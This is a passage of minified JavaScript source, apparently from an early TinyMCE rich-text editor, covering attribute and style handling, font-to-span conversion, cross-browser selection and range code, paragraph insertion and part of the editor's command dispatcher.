oldH=el.style.height;var bo=tinyMCE.getAttrib(el,"border");bo=bo==""||bo=="0"?true:false;tinyMCE.setAttrib(el,"class",tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el,"class"),state&&bo));el.style.width=oldW;el.style.height=oldH;for(var y=0;y<el.rows.length;y++){for(var x=0;x<el.rows[y].cells.length;x++){var cn=tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el.rows[y].cells[x],"class"),state&&bo);tinyMCE.setAttrib(el.rows[y].cells[x],"class",cn);}}break;case "A":var anchorName=tinyMCE.getAttrib(el,"name");if(anchorName!=''&&state){el.title=anchorName;el.className='mceItemAnchor';}else if(anchorName!=''&&!state)el.className='';break;}if(deep&&el.hasChildNodes()){for(var i=0;i<el.childNodes.length;i++)tinyMCE.handleVisualAid(el.childNodes[i],deep,state,inst);}};TinyMCE.prototype.getAttrib=function(elm,name,default_value){if(typeof(default_value)=="undefined")default_value="";if(!elm||elm.nodeType!=1)return default_value;var v=elm.getAttribute(name);if(name=="class"&&!v)v=elm.className;if(name=="style"&&!tinyMCE.isOpera)v=elm.style.cssText;return(v&&v!="")?v:default_value;};TinyMCE.prototype.setAttrib=function(element,name,value,fix_value){if(typeof(value)=="number"&&value!=null)value=""+value;if(fix_value){if(value==null)value="";var re=new RegExp('[^0-9%]','g');value=value.replace(re,'');}if(name=="style")element.style.cssText=value;if(name=="class")element.className=value;if(value!=null&&value!=""&&value!=-1)element.setAttribute(name,value);else element.removeAttribute(name);};TinyMCE.prototype.setStyleAttrib=function(elm,name,value){eval('elm.style.'+name+'=value;');if(tinyMCE.isMSIE&&value==null||value==''){var str=tinyMCE.serializeStyle(tinyMCE.parseStyle(elm.style.cssText));elm.style.cssText=str;elm.setAttribute("style",str);}};TinyMCE.prototype.convertSpansToFonts=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<span/gi,'<font');h=h.replace(/<\/span/gi,'</font');doc.body.innerHTML=h;var s=doc.getElementsByTagName("font");for(var i=0;i<s.length;i++){var size=tinyMCE.trim(s[i].style.fontSize).toLowerCase();var fSize=0;for(var x=0;x<sizes.length;x++){if(sizes[x]==size){fSize=x+1;break;}}if(fSize>0){tinyMCE.setAttrib(s[i],'size',fSize);s[i].style.fontSize='';}var fFace=s[i].style.fontFamily;if(fFace!=null&&fFace!=""){tinyMCE.setAttrib(s[i],'face',fFace);s[i].style.fontFamily='';}var fColor=s[i].style.color;if(fColor!=null&&fColor!=""){tinyMCE.setAttrib(s[i],'color',tinyMCE.convertRGBToHex(fColor));s[i].style.color='';}}};TinyMCE.prototype.convertFontsToSpans=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<font/gi,'<span');h=h.replace(/<\/font/gi,'</span');doc.body.innerHTML=h;var fsClasses=tinyMCE.getParam('font_size_classes');if(fsClasses!='')fsClasses=fsClasses.replace(/\s+/,'').split(',');else fsClasses=null;var s=doc.getElementsByTagName("span");for(var i=0;i<s.length;i++){var fSize,fFace,fColor;fSize=tinyMCE.getAttrib(s[i],'size');fFace=tinyMCE.getAttrib(s[i],'face');fColor=tinyMCE.getAttrib(s[i],'color');if(fSize!=""){fSize=parseInt(fSize);if(fSize>0&&fSize<8){if(fsClasses!=null)tinyMCE.setAttrib(s[i],'class',fsClasses[fSize-1]);else s[i].style.fontSize=sizes[fSize-1];}s[i].removeAttribute('size');}if(fFace!=""){s[i].style.fontFamily=fFace;s[i].removeAttribute('face');}if(fColor!=""){s[i].style.color=fColor;s[i].removeAttribute('color');}}};TinyMCE.prototype.setInnerHTML=function(e,h){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){e.innerHTML='<div id="mceTMPElement" style="display: none">TMP</div>'+h;e.firstChild.removeNode(true);}else e.innerHTML=h;};TinyMCE.prototype.getOuterHTML=function(e){if(tinyMCE.isMSIE)return e.outerHTML;var d=e.ownerDocument.createElement("body");d.appendChild(e);return d.innerHTML;};TinyMCE.prototype.setOuterHTML=function(doc,e,h){if(tinyMCE.isMSIE){e.outerHTML=h;return;}var d=e.ownerDocument.createElement("body");d.innerHTML=h;e.parentNode.replaceChild(d.firstChild,e);};TinyMCE.prototype.insertAfter=function(nc,rc){if(rc.nextSibling)rc.parentNode.insertBefore(nc,rc.nextSibling);else rc.parentNode.appendChild(nc);};TinyMCE.prototype.cleanupAnchors=function(doc){var an=doc.getElementsByTagName("a");for(var i=0;i<an.length;i++){if(tinyMCE.getAttrib(an[i],"name")!=""){var cn=an[i].childNodes;for(var x=cn.length-1;x>=0;x--)tinyMCE.insertAfter(cn[x],an[i]);}}};TinyMCE.prototype._setHTML=function(doc,html_content){html_content=tinyMCE.cleanupHTMLCode(html_content);try{tinyMCE.setInnerHTML(doc.body,html_content);}catch(e){if(this.isMSIE)doc.body.createTextRange().pasteHTML(html_content);}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var paras=doc.getElementsByTagName("P");for(var i=0;i<paras.length;i++){var node=paras[i];while((node=node.parentNode)!=null){if(node.nodeName.toLowerCase()=="p")node.outerHTML=node.innerHTML;}}var html=doc.body.innerHTML;if(html.indexOf('="mso')!=-1){for(var i=0;i<doc.body.all.length;i++){var el=doc.body.all[i];el.removeAttribute("className","",0);el.removeAttribute("style","",0);}html=doc.body.innerHTML;html=tinyMCE.regexpReplace(html,"<o:p><\/o:p>","<br />");html=tinyMCE.regexpReplace(html,"<o:p> <\/o:p>","");html=tinyMCE.regexpReplace(html,"<st1:.*?>","");html=tinyMCE.regexpReplace(html,"<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p><\/p>\r\n<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p> <\/p>","<br />");html=tinyMCE.regexpReplace(html,"<p>\s*(<p>\s*)?","<p>");html=tinyMCE.regexpReplace(html,"<\/p>\s*(<\/p>\s*)?","</p>");}tinyMCE.setInnerHTML(doc.body,html);}tinyMCE.cleanupAnchors(doc);if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(doc);};TinyMCE.prototype.getImageSrc=function(str){var pos=-1;if(!str)return "";if((pos=str.indexOf('this.src='))!=-1){var src=str.substring(pos+10);src=src.substring(0,src.indexOf('\''));return src;}return "";};TinyMCE.prototype._getElementById=function(element_id){var elm=document.getElementById(element_id);if(!elm){for(var j=0;j<document.forms.length;j++){for(var k=0;k<document.forms[j].elements.length;k++){if(document.forms[j].elements[k].name==element_id){elm=document.forms[j].elements[k];break;}}}}return elm;};TinyMCE.prototype.getEditorId=function(form_element){var inst=this.getInstanceById(form_element);if(!inst)return null;return inst.editorId;};TinyMCE.prototype.getInstanceById=function(editor_id){var inst=this.instances[editor_id];if(!inst){for(var n in tinyMCE.instances){var instance=tinyMCE.instances[n];if(!tinyMCE.isInstance(instance))continue;if(instance.formTargetElementId==editor_id){inst=instance;break;}}}return inst;};TinyMCE.prototype.queryInstanceCommandValue=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandValue(command);return false;};TinyMCE.prototype.queryInstanceCommandState=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandState(command);return null;};TinyMCE.prototype.setWindowArg=function(name,value){this.windowArgs[name]=value;};TinyMCE.prototype.getWindowArg=function(name,default_value){return(typeof(this.windowArgs[name])=="undefined")?default_value:this.windowArgs[name];};TinyMCE.prototype.getCSSClasses=function(editor_id,doc){var output=new Array();if(typeof(tinyMCE.cssClasses)!="undefined")return tinyMCE.cssClasses;if(typeof(editor_id)=="undefined"&&typeof(doc)=="undefined"){var instance;for(var instanceName in tinyMCE.instances){instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;break;}doc=instance.getDoc();}if(typeof(doc)=="undefined"){var instance=tinyMCE.getInstanceById(editor_id);doc=instance.getDoc();}if(doc){var styles=tinyMCE.isMSIE?doc.styleSheets:doc.styleSheets;if(styles&&styles.length>0){for(var x=0;x<styles.length;x++){var csses=null;eval("try {var csses = tinyMCE.isMSIE ? doc.styleSheets("+x+").rules : doc.styleSheets["+x+"].cssRules;} catch(e) {}");if(!csses)return new Array();for(var i=0;i<csses.length;i++){var selectorText=csses[i].selectorText;if(selectorText){var rules=selectorText.split(',');for(var c=0;c<rules.length;c++){if(rules[c].indexOf(' ')!=-1||rules[c].indexOf(':')!=-1||rules[c].indexOf('mceItem')!=-1)continue;if(rules[c]=="."+tinyMCE.settings['visual_table_class'])continue;if(rules[c].indexOf('.')!=-1){output[output.length]=rules[c].substring(rules[c].indexOf('.')+1);}}}}}}}if(output.length>0)tinyMCE.cssClasses=output;return output;};TinyMCE.prototype.regexpReplace=function(in_str,reg_exp,replace_str,opts){if(in_str==null)return in_str;if(typeof(opts)=="undefined")opts='g';var re=new RegExp(reg_exp,opts);return in_str.replace(re,replace_str);};TinyMCE.prototype.trim=function(str){return str.replace(/^\s*|\s*$/g,"");};TinyMCE.prototype.cleanupEventStr=function(str){str=""+str;str=str.replace('function anonymous()\n{\n','');str=str.replace('\n}','');str=str.replace(/^return true;/gi,'');return str;};TinyMCE.prototype.getAbsPosition=function(node){var pos=new Object();pos.absLeft=pos.absTop=0;var parentNode=node;while(parentNode){pos.absLeft+=parentNode.offsetLeft;pos.absTop+=parentNode.offsetTop;parentNode=parentNode.offsetParent;}return pos;};TinyMCE.prototype.getControlHTML=function(control_name){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_getControlHTML";if(eval("typeof("+templateFunction+")")!='undefined'){var html=eval(templateFunction+"('"+control_name+"');");if(html!="")return tinyMCE.replaceVar(html,"pluginurl",tinyMCE.baseURL+"/plugins/"+themePlugins[i]);}}return eval('TinyMCE_'+tinyMCE.settings['theme']+"_getControlHTML"+"('"+control_name+"');");};TinyMCE.prototype._themeExecCommand=function(editor_id,element,command,user_interface,value){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined'){if(eval(templateFunction+"(editor_id, element, command, user_interface, value);"))return true;}}templateFunction='TinyMCE_'+tinyMCE.settings['theme']+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined')return eval(templateFunction+"(editor_id, element, command, user_interface, value);");return false;};TinyMCE.prototype._getThemeFunction=function(suffix,skip_plugins){if(skip_plugins)return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+suffix;if(eval("typeof("+templateFunction+")")!='undefined')return templateFunction;}return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;};TinyMCE.prototype.isFunc=function(func_name){if(func_name==null||func_name=="")return false;return eval("typeof("+func_name+")")!="undefined";};TinyMCE.prototype.exec=function(func_name,args){var str=func_name+'(';for(var i=3;i<args.length;i++){str+='args['+i+']';if(i<args.length-1)str+=',';}str+=');';return eval(str);};TinyMCE.prototype.executeCallback=function(param,suffix,mode){switch(mode){case 0:var state=false;var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}return state;case 1:var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}return false;}};TinyMCE.prototype.debug=function(){var msg="";var elm=document.getElementById("tinymce_debug");if(!elm){var debugDiv=document.createElement("div");debugDiv.setAttribute("className","debugger");debugDiv.className="debugger";debugDiv.innerHTML='\ Debug output:\ <textarea id="tinymce_debug" style="width: 100%; height: 300px" wrap="nowrap"></textarea>';document.body.appendChild(debugDiv);elm=document.getElementById("tinymce_debug");}var args=this.debug.arguments;for(var i=0;i<args.length;i++){msg+=args[i];if(i<args.length-1)msg+=', ';}elm.value+=msg+"\n";};function TinyMCEControl(settings){this.undoLevels=new Array();this.undoIndex=0;this.typingUndoIndex=-1;this.undoRedo=true;this.isTinyMCEControl=true;this.settings=settings;this.settings['theme']=tinyMCE.getParam("theme","default");this.settings['width']=tinyMCE.getParam("width",-1);this.settings['height']=tinyMCE.getParam("height",-1);};TinyMCEControl.prototype.repaint=function(){if(tinyMCE.isMSIE)return;this.getBody().style.display='none';this.getBody().style.display='block';};TinyMCEControl.prototype.switchSettings=function(){if(tinyMCE.configs.length>1&&tinyMCE.currentConfig!=this.settings['index']){tinyMCE.settings=this.settings;tinyMCE.currentConfig=this.settings['index'];}};TinyMCEControl.prototype.fixBrokenURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('mce_real_src');if(src&&src!="")elms[i].setAttribute("src",src);}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('mce_real_href');if(href&&href!="")elms[i].setAttribute("href",href);}};TinyMCEControl.prototype.convertAllRelativeURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('src');if(src&&src!=""){src=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],src);elms[i].setAttribute("src",src);elms[i].setAttribute("mce_real_src",src);}}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('href');if(href&&href!=""){href=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],href);elms[i].setAttribute("href",href);elms[i].setAttribute("mce_real_href",href);}}};TinyMCEControl.prototype.getSelectedHTML=function(){if(tinyMCE.isSafari){return this.getRng().toString();}var elm=document.createElement("body");if(tinyMCE.isGecko)elm.appendChild(this.getRng().cloneContents());else elm.innerHTML=this.getRng().htmlText;return tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,elm,this.visualAid);};TinyMCEControl.prototype.getBookmark=function(){var rng=this.getRng();if(tinyMCE.isSafari)return rng;if(tinyMCE.isMSIE)return rng;if(tinyMCE.isGecko)return rng.cloneRange();return null;};TinyMCEControl.prototype.moveToBookmark=function(bookmark){if(tinyMCE.isSafari){var sel=this.getSel().realSelection;sel.setBaseAndExtent(bookmark.startContainer,bookmark.startOffset,bookmark.endContainer,bookmark.endOffset);return true;}if(tinyMCE.isMSIE)return bookmark.select();if(tinyMCE.isGecko){var rng=this.getDoc().createRange();var sel=this.getSel();rng.setStart(bookmark.startContainer,bookmark.startOffset);rng.setEnd(bookmark.endContainer,bookmark.endOffset);sel.removeAllRanges();sel.addRange(rng);return true;}return false;};TinyMCEControl.prototype.getSelectedText=function(){if(tinyMCE.isMSIE){var doc=this.getDoc();if(doc.selection.type=="Text"){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText='';}else{var sel=this.getSel();if(sel&&sel.toString)selectedText=sel.toString();else selectedText='';}return selectedText;};TinyMCEControl.prototype.selectNode=function(node,collapse,select_text_node,to_start){if(!node)return;if(typeof(collapse)=="undefined")collapse=true;if(typeof(select_text_node)=="undefined")select_text_node=false;if(typeof(to_start)=="undefined")to_start=true;if(tinyMCE.isMSIE){var rng=this.getBody().createTextRange();try{rng.moveToElementText(node);if(collapse)rng.collapse(to_start);rng.select();}catch(e){}}else{var sel=this.getSel();if(!sel)return;if(tinyMCE.isSafari){sel.realSelection.setBaseAndExtent(node,0,node,node.innerText.length);if(collapse){if(to_start)sel.realSelection.collapseToStart();else sel.realSelection.collapseToEnd();}this.scrollToNode(node);return;}var rng=this.getDoc().createRange();if(select_text_node){var nodes=tinyMCE.getNodeTree(node,new Array(),3);if(nodes.length>0)rng.selectNodeContents(nodes[0]);else rng.selectNodeContents(node);}else rng.selectNode(node);if(collapse){if(!to_start&&node.nodeType==3){rng.setStart(node,node.nodeValue.length);rng.setEnd(node,node.nodeValue.length);}else rng.collapse(to_start);}sel.removeAllRanges();sel.addRange(rng);}this.scrollToNode(node);tinyMCE.selectedElement=null;if(node.nodeType==1)tinyMCE.selectedElement=node;};TinyMCEControl.prototype.scrollToNode=function(node){var pos=tinyMCE.getAbsPosition(node);var doc=this.getDoc();var scrollX=doc.body.scrollLeft+doc.documentElement.scrollLeft;var scrollY=doc.body.scrollTop+doc.documentElement.scrollTop;var height=tinyMCE.isMSIE?document.getElementById(this.editorId).style.pixelHeight:this.targetElement.clientHeight;if(!tinyMCE.settings['auto_resize']&&!(pos.absTop>scrollY&&pos.absTop<(scrollY-25+height)))this.contentWindow.scrollTo(pos.absLeft,pos.absTop-height+25);};TinyMCEControl.prototype.getBody=function(){return this.getDoc().body;};TinyMCEControl.prototype.getDoc=function(){return this.contentWindow.document;};TinyMCEControl.prototype.getWin=function(){return this.contentWindow;};TinyMCEControl.prototype.getSel=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return this.getDoc().selection;var sel=this.contentWindow.getSelection();if(tinyMCE.isSafari&&!sel.getRangeAt){var newSel=new Object();var doc=this.getDoc();function getRangeAt(idx){var rng=new Object();rng.startContainer=this.focusNode;rng.endContainer=this.anchorNode;rng.commonAncestorContainer=this.focusNode;rng.createContextualFragment=function(html){if(html.charAt(0)=='<'){var elm=doc.createElement("div");elm.innerHTML=html;return elm.firstChild;}return doc.createTextNode("UNSUPPORTED, DUE TO LIMITATIONS IN SAFARI!");};rng.deleteContents=function(){doc.execCommand("Delete",false,"");};return rng;}newSel.focusNode=sel.baseNode;newSel.focusOffset=sel.baseOffset;newSel.anchorNode=sel.extentNode;newSel.anchorOffset=sel.extentOffset;newSel.getRangeAt=getRangeAt;newSel.text=""+sel;newSel.realSelection=sel;newSel.toString=function(){return this.text;};return newSel;}return sel;};TinyMCEControl.prototype.getRng=function(){var sel=this.getSel();if(sel==null)return null;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return sel.createRange();if(tinyMCE.isSafari){var rng=this.getDoc().createRange();var sel=this.getSel().realSelection;rng.setStart(sel.baseNode,sel.baseOffset);rng.setEnd(sel.extentNode,sel.extentOffset);return rng;}return this.getSel().getRangeAt(0);};TinyMCEControl.prototype._insertPara=function(e){function isEmpty(para){function isEmptyHTML(html){return html.replace(new RegExp('[ \t\r\n]+','g'),'').toLowerCase()=="";}if(para.getElementsByTagName("img").length>0)return false;if(para.getElementsByTagName("table").length>0)return false;if(para.getElementsByTagName("hr").length>0)return false;var nodes=tinyMCE.getNodeTree(para,new Array(),3);for(var i=0;i<nodes.length;i++){if(!isEmptyHTML(nodes[i].nodeValue))return false;}return true;}var doc=this.getDoc();var sel=this.getSel();var win=this.contentWindow;var rng=sel.getRangeAt(0);var body=doc.body;var rootElm=doc.documentElement;var self=this;var blockName="P";var rngBefore=doc.createRange();rngBefore.setStart(sel.anchorNode,sel.anchorOffset);rngBefore.collapse(true);var rngAfter=doc.createRange();rngAfter.setStart(sel.focusNode,sel.focusOffset);rngAfter.collapse(true);var direct=rngBefore.compareBoundaryPoints(rngBefore.START_TO_END,rngAfter)<0;var startNode=direct?sel.anchorNode:sel.focusNode;var startOffset=direct?sel.anchorOffset:sel.focusOffset;var endNode=direct?sel.focusNode:sel.anchorNode;var endOffset=direct?sel.focusOffset:sel.anchorOffset;startNode=startNode.nodeName=="BODY"?startNode.firstChild:startNode;endNode=endNode.nodeName=="BODY"?endNode.firstChild:endNode;var startBlock=tinyMCE.getParentBlockElement(startNode);var endBlock=tinyMCE.getParentBlockElement(endNode);if(startBlock!=null){blockName=startBlock.nodeName;if(blockName=="TD"||blockName=="TABLE"||(blockName=="DIV"&&new RegExp('left|right','gi').test(startBlock.style.cssFloat)))blockName="P";}if(tinyMCE.getParentElement(startBlock,"OL,UL")!=null)return false;if((startBlock!=null&&startBlock.nodeName=="TABLE")||(endBlock!=null&&endBlock.nodeName=="TABLE"))startBlock=endBlock=null;var paraBefore=(startBlock!=null&&startBlock.nodeName==blockName)?startBlock.cloneNode(false):doc.createElement(blockName);var paraAfter=(endBlock!=null&&endBlock.nodeName==blockName)?endBlock.cloneNode(false):doc.createElement(blockName);if(/^(H[1-6])$/.test(blockName))paraAfter=doc.createElement("p");var startChop=startNode;var endChop=endNode;node=startChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;startChop=node;}while((node=node.previousSibling?node.previousSibling:node.parentNode));node=endChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;endChop=node;}while((node=node.nextSibling?node.nextSibling:node.parentNode));if(startChop.nodeName=="TD")startChop=startChop.firstChild;if(endChop.nodeName=="TD")endChop=endChop.lastChild;if(startBlock==null){rng.deleteContents();sel.removeAllRanges();if(startChop!=rootElm&&endChop!=rootElm){rngBefore=rng.cloneRange();if(startChop==body)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);paraBefore.appendChild(rngBefore.cloneContents());if(endChop.parentNode.nodeName==blockName)endChop=endChop.parentNode;rng.setEndAfter(endChop);if(endChop.nodeName!="#text"&&endChop.nodeName!="BODY")rngBefore.setEndAfter(endChop);var contents=rng.cloneContents();if(contents.firstChild&&(contents.firstChild.nodeName==blockName||contents.firstChild.nodeName=="BODY"))paraAfter.innerHTML=contents.firstChild.innerHTML;else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";rng.deleteContents();rngAfter.deleteContents();rngBefore.deleteContents();paraAfter.normalize();rngBefore.insertNode(paraAfter);paraBefore.normalize();rngBefore.insertNode(paraBefore);}else{body.innerHTML="<"+blockName+"> </"+blockName+"><"+blockName+"> </"+blockName+">";paraAfter=body.childNodes[1];}this.selectNode(paraAfter,true,true);return true;}if(startChop.nodeName==blockName)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);rngBefore.setEnd(startNode,startOffset);paraBefore.appendChild(rngBefore.cloneContents());rngAfter.setEndAfter(endChop);rngAfter.setStart(endNode,endOffset);var contents=rngAfter.cloneContents();if(contents.firstChild&&contents.firstChild.nodeName==blockName){paraAfter.innerHTML=contents.firstChild.innerHTML;}else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";var rng=doc.createRange();if(!startChop.previousSibling&&startChop.parentNode.nodeName.toUpperCase()==blockName){rng.setStartBefore(startChop.parentNode);}else{if(rngBefore.startContainer.nodeName.toUpperCase()==blockName&&rngBefore.startOffset==0)rng.setStartBefore(rngBefore.startContainer);else rng.setStart(rngBefore.startContainer,rngBefore.startOffset);}if(!endChop.nextSibling&&endChop.parentNode.nodeName.toUpperCase()==blockName)rng.setEndAfter(endChop.parentNode);else rng.setEnd(rngAfter.endContainer,rngAfter.endOffset);rng.deleteContents();rng.insertNode(paraAfter);rng.insertNode(paraBefore);paraAfter.normalize();paraBefore.normalize();this.selectNode(paraAfter,true,true);return true;};TinyMCEControl.prototype._handleBackSpace=function(evt_type){var doc=this.getDoc();var sel=this.getSel();if(sel==null)return false;var rng=sel.getRangeAt(0);var node=rng.startContainer;var elm=node.nodeType==3?node.parentNode:node;if(node==null)return;if(elm&&elm.nodeName==""){var para=doc.createElement("p");while(elm.firstChild)para.appendChild(elm.firstChild);elm.parentNode.insertBefore(para,elm);elm.parentNode.removeChild(elm);var rng=rng.cloneRange();rng.setStartBefore(node.nextSibling);rng.setEndAfter(node.nextSibling);rng.extractContents();this.selectNode(node.nextSibling,true,true);}var para=tinyMCE.getParentBlockElement(node);if(para!=null&¶.nodeName.toLowerCase()=='p'&&evt_type=="keypress"){var htm=para.innerHTML;var block=tinyMCE.getParentBlockElement(node);if(htm==""||htm==" "||block.nodeName.toLowerCase()=="li"){var prevElm=para.previousSibling;while(prevElm!=null&&prevElm.nodeType!=1)prevElm=prevElm.previousSibling;if(prevElm==null)return false;var nodes=tinyMCE.getNodeTree(prevElm,new Array(),3);var lastTextNode=nodes.length==0?null:nodes[nodes.length-1];if(lastTextNode!=null)this.selectNode(lastTextNode,true,false,false);para.parentNode.removeChild(para);return true;}}return false;};TinyMCEControl.prototype._insertSpace=function(){return true;};TinyMCEControl.prototype.autoResetDesignMode=function(){if(!tinyMCE.isMSIE&&tinyMCE.settings['auto_reset_designmode']){var sel=this.getSel();if(!sel||!sel.rangeCount||sel.rangeCount==0)eval('try { this.getDoc().designMode = "On"; } catch(e) {}');}};TinyMCEControl.prototype.isDirty=function(){return this.startContent!=tinyMCE.trim(this.getBody().innerHTML)&&!tinyMCE.isNotDirty;};TinyMCEControl.prototype._mergeElements=function(scmd,pa,ch,override){if(scmd=="removeformat"){pa.className="";pa.style.cssText="";ch.className="";ch.style.cssText="";return;}var st=tinyMCE.parseStyle(tinyMCE.getAttrib(pa,"style"));var stc=tinyMCE.parseStyle(tinyMCE.getAttrib(ch,"style"));var className=tinyMCE.getAttrib(pa,"class");className+=" "+tinyMCE.getAttrib(ch,"class");if(override){for(var n in st){if(typeof(st[n])=='function')continue;stc[n]=st[n];}}else{for(var n in stc){if(typeof(stc[n])=='function')continue;st[n]=stc[n];}}tinyMCE.setAttrib(pa,"style",tinyMCE.serializeStyle(st));tinyMCE.setAttrib(pa,"class",tinyMCE.trim(className));ch.className="";ch.style.cssText="";ch.removeAttribute("class");ch.removeAttribute("style");};TinyMCEControl.prototype.setUseCSS=function(b){var doc=this.getDoc();try{doc.execCommand("useCSS",false,!b);}catch(ex){}try{doc.execCommand("styleWithCSS",false,b);}catch(ex){}};TinyMCEControl.prototype.execCommand=function(command,user_interface,value){var doc=this.getDoc();var win=this.getWin();var focusElm=this.getFocusElement();if(this.lastSafariSelection&&!new RegExp('mceStartTyping|mceEndTyping|mceBeginUndoLevel|mceEndUndoLevel|mceAddUndoLevel','gi').test(command)){this.moveToBookmark(this.lastSafariSelection);tinyMCE.selectedElement=this.lastSafariSelectedElement;}if(!tinyMCE.isMSIE&&!this.useCSS){this.setUseCSS(false);this.useCSS=true;}this.contentDocument=doc;if(tinyMCE._themeExecCommand(this.editorId,this.getBody(),command,user_interface,value))return;if(focusElm&&focusElm.nodeName=="IMG"){var align=focusElm.getAttribute('align');var img=command=="JustifyCenter"?focusElm.cloneNode(false):focusElm;switch(command){case "JustifyLeft":if(align=='left')img.removeAttribute('align');else img.setAttribute('align','left');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyCenter":img.removeAttribute('align');var div=tinyMCE.getParentElement(focusElm,"div");if(div&&div.style.textAlign=="center"){if(div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);}else{var div=this.getDoc().createElement("div");div.style.textAlign='center';div.appendChild(img);focusElm.parentNode.replaceChild(div,focusElm);}this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyRight":if(align=='right')img.removeAttribute('align');else img.setAttribute('align','right');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;}}if(tinyMCE.settings['force_br_newlines']){var alignValue="";if(doc.selection.type!="Control"){switch(command){case "JustifyLeft":alignValue="left";break;case "JustifyCenter":alignValue="center";break;case "JustifyFull":alignValue="justify";break;case "JustifyRight":alignValue="right";break;}if(alignValue!=""){var rng=doc.selection.createRange();if((divElm=tinyMCE.getParentElement(rng.parentElement(),"div"))!=null)divElm.setAttribute("align",alignValue);else if(rng.pasteHTML&&rng.htmlText.length>0)rng.pasteHTML('<div align="'+alignValue+'">'+rng.htmlText+"</div>");tinyMCE.triggerNodeChange();return;}}}switch(command){case "mceRepaint":this.repaint();return true;case "mceStoreSelection":this.selectionBookmark=this.getBookmark();return true;case "mceRestoreSelection":this.moveToBookmark(this.selectionBookmark);return true;case "InsertUnorderedList":case "InsertOrderedList":var tag=(command=="InsertUnorderedList")?"ul":"ol";if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<"+tag+"><li> </li><"+tag+">");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "Strikethrough":if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<strike>"+this.getSelectedHTML()+"</strike>");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "mceSelectNode":this.selectNode(value);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=value;break;case "FormatBlock":if(value==null||value==""){var elm=tinyMCE.getParentElement(this.getFocusElement(),"p,div,h1,h2,h3,h4,h5,h6,pre,address");if(elm)this.execCommand("mceRemoveNode",false,elm);}else this.getDoc().execCommand("FormatBlock",false,value);tinyMCE.triggerNodeChange();break;case 